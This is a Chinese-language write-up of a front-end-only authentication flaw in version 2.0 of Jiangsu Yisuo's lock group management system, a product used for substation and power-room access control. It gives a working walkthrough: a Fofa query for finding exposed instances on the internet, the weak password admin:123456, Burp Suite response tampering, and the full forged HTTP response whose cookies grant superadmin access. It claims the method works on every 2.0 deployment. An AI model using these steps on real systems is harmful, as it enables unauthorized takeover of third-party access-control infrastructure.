一:漏洞介绍
江苏易索电子科技股份有限公司是专业从事变电站视频监控系统、无源智能锁群管理系统开发、电力智能辅助监控系统,配电房监控系统,智能门禁系统,生产及销售的高科技企业。 江苏易索电子科技股份有限公司锁群管理系统存在逻辑缺陷漏洞,攻击者可利用该漏洞获取敏感信息。
》》》漏洞详情《《《
在登陆处由于只进行了前端验证,造成用户可以伪造前端的返回包内容来绕过登录,进而进入后台接管后台权限。
经过测试发现,可以通杀2.0版本。
二:漏洞利用
步骤一:使用Fofa搜索以下语句并随便打开一个连接地址...尝试若口令登录(admin:123456)
title=="锁群管理系统 V2.0"
步骤二:设置Burpsuite抓取Response数据包并添加如下规则...
步骤三:在登录页面输入用户名admin并随便输入密码,开启代理抓包修改返回数据包如下...
修改之前: HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Thu, 25 Nov 2021 09:29:15 GMT Connection: close Content-Length: 30 用户名或密码不正确! 修改之后: HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: username=admin; path=/ Set-Cookie: code=admin; path=/ Set-Cookie: power=1; path=/ Set-Cookie: powerName=%e8%b6%85%e7%ba%a7%e7%ae%a1%e7%90%86%e5%91%98; path=/ X-Powered-By: ASP.NET Date: Thu, 25 Nov 2021 09:29:15 GMT Connection: close Content-Length: 30 0
步骤四:放包之后就可以登录到后台界面中...此时操作关闭代理